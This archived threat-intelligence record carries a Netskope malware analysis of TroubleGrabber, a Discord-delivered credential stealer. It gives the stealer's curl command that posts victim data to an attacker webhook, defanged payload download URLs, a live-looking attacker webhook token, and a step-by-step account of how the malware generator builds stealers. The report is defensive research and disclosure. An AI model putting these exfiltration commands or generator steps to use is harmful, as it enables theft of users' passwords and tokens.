{ "id": "1b7755dd-37ce-4b8d-9b8d-9c8b14947b3d", "created_at": "2026-04-06T00:15:22.218778Z", "updated_at": "2026-04-10T13:12:42.676378Z", "deleted_at": null, "sha1_hash": "f0f610ad41745028b46afdf3a851e1937331de5e", "title": "Here Comes TroubleGrabber: Stealing Credentials Through Discord", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 106985, "plain_text": "Here Comes TroubleGrabber: Stealing Credentials Through Discord\r\nBy Ashwin Vamshi\r\nPublished: 2020-11-13 · Archived: 2026-04-05 21:18:16 UTC\r\n“TroubleGrabber” is a new credential stealer that is being spread through Discord attachments and uses Discord messages to\r\ncommunicate stolen credentials back to the attacker. While it bears some functional similarity to AnarchyGrabber, it is\r\nimplemented differently and does not appear to be linked to the same group. TroubleGrabber is written by an individual\r\nnamed “Itroublve” and is currently used by multiple threat actors to target victims on Discord.\r\nThis malware, which primarily arrives via drive-by download, steals the web browser tokens, Discord webhook tokens, web\r\nbrowser passwords, and system information. This information is sent via webhook as a chat message to the attacker’s\r\nDiscord server. Based on the file names and delivery mechanisms, TroubleGrabber is actively being used to target gamers.\r\nWe discovered TroubleGrabber in October 2020 when researching public Discord attachments for our previous blog post,\r\nLeaky Chats: Accidental Exposure and Malware in Discord Attachments.\r\nThis post will detail the technical analysis of TroubleGrabber and provide insights on the generator and its creator.\r\nDiscovery\r\nIn October 2020 alone, we identified more than 5,700 public Discord attachment URLs hosting malicious content, mostly in\r\nthe form of Windows executable files and archives. At the same time, we scanned our malware database for samples\r\ncontaining Discord URLs used as next stage payloads or C2’s.\r\nFigure 1 shows a breakdown of the top five detections of 1,650 malware samples from the same time period that were\r\ndelivered from Discord and also contained Discord URLs.\r\nFigure 1: Top five detections\r\nThese detections are related to two distinct groups of malware \r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 1 of 15\n\n1. GameHack – Gen:Variant.Mikey.115607, Trojan.GenericKD.43979330 were patched or cracked versions of popular\r\ngames. All the files associated with these detections were delivered via Discord.\r\n2. TroubleGrabber – Gen:Variant.Razy.742965 and Gen:Variant.Razy.728469 were the first stage payload of\r\nGen:Variant.Razy.729793, a new malware variant we had not seen before October 2020. The files associated with\r\nthese detections used Discord for malware delivery, next stage payloads, and C2 communication.\r\nAttack depiction\r\nThe visual depiction of the TroubleGrabber attack kill chain is shown in Figure 2.\r\nFigure 2: TroubleGrabber attack kill chain\r\nThe depiction in Figure 2 illustrates the following steps\r\nThe delivery of TroubleGrabber to the victim’s machine via Discord attachment link.\r\nTruoubleGrabber using Discord and Github for downloading the next stage payloads to the victim’s machine. \r\nThe payloads steal victims credentials like system information, IP address, web browser passwords, and tokens. It\r\nthen sends them as a chat message back to the attacker via a webhook URL.\r\nTroubleGrabber analysis\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 2 of 15\n\nThe sample we are using for this analysis was hosted in the Discord URL – \r\nhttps://cdn[.]discordapp[.]com/attachments/770854312020410388/770854941614014504/Discord_Nitro_Generator_and_Checker.r\r\n(md5 – 172c6141eaa2a9b09827d149cb3b05ca). The downloaded archive “Discord_Nitro_Generator_and_Checker.rar”\r\nmasqueraded as a Discord Nitro Generator application. The archive contained an executable file named “Discord Nitro\r\nGenerator and Checker.exe”. An excerpt from the decompiled code is shown in Figure 3.\r\nFigure 3: Decompiled code of Discord Nitro Generator and Checker.exe\r\nFigure 3 illustrates that the executable downloads the next stage payloads to “C:/temp” from the seven URLs hosted in\r\nDiscord and Github as listed below\r\nhttps://cdn[.]discordapp[.]com/attachments/773838254905622541/773838310610829312/Token_Stealer[.]bat\r\nhttps://raw[.]githubusercontent[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/master/AVOID%20ME/tokenstealer[.]vb\r\nhttps://raw[.]githubusercontent[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/master/AVOID%20ME/tokenstealer2[.]v\r\nhttps://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/blob/master/AVOID%20ME/WebBrowserPassView[.]exe?raw=\r\nhttps://raw[.]githubusercontent[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/master/AVOID%20ME/curl-ca-bundle[.]\r\nhttps://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/blob/master/AVOID%20ME/curl[.]exe?raw=true\r\nhttps://cdn[.]discordapp[.]com/attachments/773838254905622541/773838305497186304/sendhookfile[.]exe\r\nThe functionality of curl.exe, Curl-ca-bundle.crt, WebBrowserPassView.exe, tokenstealer.vbs,\r\nTokenstealer2.vbs,Tokenstealer.bat, and sendhookfile.exe is as follows:\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 3 of 15\n\nCurl.exe\r\nCurl.exe is a command-line tool that is used for uploading, downloading, and posting data over multiple supported\r\nprotocols. The malware uses a curl command for posting status message of the victim’s details via webhook as follows:\r\nC:/temp/curl -X POST -H \"Content-type: application/json\" --data \"{\\\"content\\\": \\\"**INJECTION STARTED!**\\\"}\" Webhook\r\nCurl-ca-bundle.crt\r\nCurl-ca-bundle.crt is the certificate used by curl to validate with the remote server. Curl performs SSL certificate verification\r\nby using the public certificate authorities present in the file curl-ca-bundle.crt for uploading, downloading, and posting data.\r\nWebBrowserPassView.exe\r\nWebBrowserPassView.exe is a password recovery utility from Nirsoft that reveals the passwords saved in web browsers.\r\nThis utility has a history of being used by threat actors to steal the stored passwords and send them back to their C2.\r\nTroubleGrabber uses WebBrowserPassView.exe to do the same.\r\nTokenstealer.vbs\r\nTokenstealer.vbs is a Visual Basic script that extracts information from the infected host, including the product name,\r\nproduct ID, and product key, and saves it in the location “C:\\temp\\WindowsInfo.txt”.\r\nTokenstealer2.vbs\r\nTokenstealer2.vbs is a Visual Basic script that executes the file present in the location “C:\\temp\\finalres.bat”. Finalres.bat is\r\nthe renamed file of tokenstealer.bat.\r\nTokenstealer.bat\r\nTokenstealer.bat is a batch file that performs the following actions\r\nUses https://myexternalip.com/raw to query the external IP address of the victim and saves it to the location\r\n“C:\\temp\\ip_address.txt”\r\nUses WebBrowserPassView.exe with the switch ‘stext’ to reveal the passwords saved in all of the victim’s web\r\nbrowsers and saves them to the location “C:/temp/Passwords.txt”\r\nUses Windows system info with the switch ‘findstr’ and wmic commands to find the “Domain,” “OS Name,” “OS\r\nVersion,” “System Manufacturer,” “System Model,” “System type,” “Total Physical Memory,” “Disk drive,” “Hard\r\nDrive Space,” “Serial number,” and “cpuname”’ and saves it to the location “C:\\temp\\System_INFO.txt”\r\nPerforms curl posts of username, time and date, IP address, SystemInfo, and Discord, PTB, and Canary tokens via\r\nwebhooks to the attacker’s Discord server\r\nExecutes filed.exe and customeExe.exe using the switch –processStart from the location “C:\\temp\\”\r\nKills Discord.exe, DiscordCanary.exe, and DiscordPTB.exe forcefully by using taskkill with the switch “/f /im” and\r\nrestarts them\r\nDeletes the files ip_address.txt, WindowsInfo.txt, Passwords.txt, curl-ca-bundle.crt, curl.exe, and CustomEXE.exe\r\nusing del command with the switch “/f /q”\r\nShuts down and restarts the machine in 30 seconds using the shutdown command\r\nSendhookfile.exe\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 4 of 15\n\nSendhookfile.exe is an executable file that steals the tokens from web browsers and native Discord apps and posts them to\r\nthe Discord webhook URL, “https://discord[.]com/api/webhooks/770853687592878092/Tt_nUInR-OAYwvSoRbXXJfArRFgMMFTweKLmgJDnS-YyAahH7gKiRCmwE_aG1gIbL0mX” as shown in Figure 4.\r\nFigure 4: Decompiled code of sendhookfile.exe\r\nExecution issues\r\nDuring our analysis, the executable crashed in our sandbox environment as shown in Figure 5.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 5 of 15\n\nFigure 5: Discord Nitro Generator and Checker.exe crash\r\nThis same crash message was seen for several other binaries that we executed in our analysis test environments. The\r\nexecutables crashed because the binaries were compiled without the support of TLS 1.2, which is not supported by default in\r\nthe .NET 4.5 framework installed in our analysis machines. This is supported by default in .NET 4.6 and above.\r\nOn execution, the malware downloaded the binaries to the location “C:\\temp” as shown in Figure 6.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 6 of 15\n\nFigure 6: Next stage payloads downloaded to the location “C:\\temp”\r\nThe malware further sent all the victim’s credentials via webhooks as chat messages as shown in Figure 7.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 7 of 15\n\nFigure 7: Credentials sent as chat messages via webhooks\r\nGithub account – Itroublve\r\n“Discord Nitro Generator and Checker.exe” downloaded five next stage payloads from the Github user Itroublve in the\r\nrepository “https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator” as shown in Figure 8.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 8 of 15\n\nFigure 8: Github repository of Token-Browser-Password-Stealer-Creator\r\nWe downloaded the latest release “ItroublveTSC V5.1” from the location “https://github.com/Itroublve/Token-Browser-Password-Stealer-Creator/releases/tag/5.1”. The package contained the generator of the malware and its components.\r\nItroublveTSC_V5.1\r\nThe package contained an executable named “ItroublveTSC.exe” that is used to generate the malware and its components as\r\nshown in Figure 9.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 9 of 15\n\nFigure 9: ItroublveTSC V5.1\r\nThe working of the generator is as follows\r\nThe user provides their webhooks token in the “Webhook Here” section and clicks the “Create Stealer Files”\r\ncheckbox. This generates two files, namely “sendhookfile.exe” and “Token Stealer.bat” in the location\r\n“ItroublveTSC_V5.1\\output”.\r\nThe user uploads “sendhookfile.exe” and “Token Stealer.bat” to any file sharing app and pastes the links in the\r\ngenerator.\r\nThe user can also enter a fake message box, add a custom icon, enter the file details and also select additional options\r\nincluding “Crash PC”, “Auto Remove EXE,” “Restart Discord,” “Restart PC,” “ShutdownPC,” and “Custom EXE”.\r\nThe user clicks “Create Stealer” to generate a file named “Token Stealer.exe” in the “ItroublveTSC_V5.1” folder.\r\nAt the time of this writing, the information tab in the generator pointed to the webpage\r\nhttps://itroublvehacker[.]ml/howtousev5, which was not responsive.\r\nWe added the TLS 1.2 support to the source code we compiled as a working binary, as shown in the second line of the main\r\n() function in Figure 10, to avoid the execution issues mentioned above.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 10 of 15\n\nFigure 10: Source code of ItroublveTSC_V5.1\r\nItroublve – OSINT\r\nThe original author of this malware, “Ithoublve” pasted their moniker throughout both the generator and malware. Through\r\nopen-source intelligence (OSINT) analysis, we identified the Discord server, Facebook page, Twitter, Instagram, website,\r\nemail address, and YouTube channel of “Itroublve”. In one of the Facebook posts, Itroublve mentions that the YouTube\r\nchannel was terminated, thereby creating a new channel. At the time of this writing, the Discord server of Itroublve had 573\r\nmembers as shown in Figure 11.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 11 of 15\n\nFigure 11: Discord server of Itroublve\r\nThe YouTube page contained a demonstration of the usage of the ItroublveTSC generator where Itroublve demonstrated how\r\nto upload the files “Token Stealer.bat” and “Sendhookfile.exe” to Discord, and generate public links to enter in the check\r\nbox as shown in Figure 12.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 12 of 15\n\nFigure 12: Generate public link for “Token Stealer.bat” and “Sendhookfile.exe”\r\nOur analysis shows that multiple hackers have followed this exact tutorial, evident from the number of different Discord\r\nservers used to host the generated malware. \r\nObservations\r\nTroubleGrabber is the latest example of malware that abuses cloud apps across every stage of the kill chain. Specifically,\r\nTroubleGrabber uses four common techniques:\r\nUsing cloud apps for initial delivery. Attackers select cloud apps that are likely to be widely used by their targets.\r\nUsing cloud apps for next stage payload delivery. Attackers are increasingly using cloud apps to download second\r\npayloads, again using apps that are popular among their targets and therefore likely to be allowed. \r\nUsing cloud apps for command and control. Like initial delivery and next stage payload delivery, using apps that\r\nare popular among their targets helps attackers evade detection.  \r\nStealing cloud app credentials. This could mean usernames and passwords or tokens. Stolen credentials can be used\r\nfor a variety of reasons, including spying on the victim or launching additional attacks from the victims account.  \r\nTroubleGrabber shares similarities to different password and token stealer families like AnarchyGrabber, a malware that\r\nsteals passwords and user tokens, disables 2FA, and spreads malware to the victim’s Discord server. However, it is a\r\ncompletely new implementation and does not appear to be linked to the same group. \r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 13 of 15\n\nWe identified more than 1,000 generated binaries that were distributed via drive-by download URLs with file names posing\r\nas game cheats, Discord installers, and software cracks. Figure 13 shows that it was distributed primarily via Discord, with\r\nsmall numbers distributed via anonfiles.com and anonymousfiles.io, services that allow users to upload files anonymously\r\nand free for generating a public download link.\r\nFigure 13: TroubleGrabber drive-by download URLs\r\nAlongside this, we also identified the malware being distributed from more than 700 different Discord server channel ID’s.\r\nConclusions\r\nTroubleGrabber, a new credential stealer, serves as yet another example of a trend of attackers using cloud apps to abuse the\r\ntrust users place in those apps and evade detection. The malware uses Discord and Github to deliver the next stage payloads\r\nand uses Discord webhooks as a C2 to send the victims credentials. Such attacks require security solutions with application-layer detections, multiple threat detection solutions, DLP, and machine learning techniques that understand the language and\r\nnature of the cloud and web. Customers using Netskope Threat protection are protected from this threat.\r\nNetskope Threat Labs have reported the attack elements of TroubleGrabber to Discord, GitHub, YouTube, Facebook,\r\nTwitter, and Instagram on November 10, 2020.\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 14 of 15\n\nThe Indicators Of Compromise (IOC’s) associated with TroubleGrabber is available on Github –\r\nhttps://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/TroubleGrabber.\r\nSource: https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nhttps://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord" ], "report_names": [ "here-comes-troublegrabber-stealing-credentials-through-discord" ], "threat_actors": [ { "id": "9041c438-4bc0-4863-b89c-a32bba33903c", "created_at": "2023-01-06T13:46:38.232751Z", "updated_at": "2026-04-10T02:00:02.888195Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove" ], "source_name": "MISPGALAXY:Nitro", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b44a04-a080-4465-973d-976ce53777de", "created_at": "2022-10-25T16:07:23.911791Z", "updated_at": "2026-04-10T02:00:04.786538Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove", "Nitro" ], "source_name": "ETDA:Nitro", "tools": [ "AngryRebel", "Backdoor.Apocalipto", "Chymine", "Darkmoon", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Moudour", "Mydoor", "PCClient", "PCRat", "Poison Ivy", "SPIVY", "Spindest", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434522, "ts_updated_at": 1775826762, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f0f610ad41745028b46afdf3a851e1937331de5e.pdf", "text": "https://archive.orkl.eu/f0f610ad41745028b46afdf3a851e1937331de5e.txt", "img": "https://archive.orkl.eu/f0f610ad41745028b46afdf3a851e1937331de5e.jpg" } }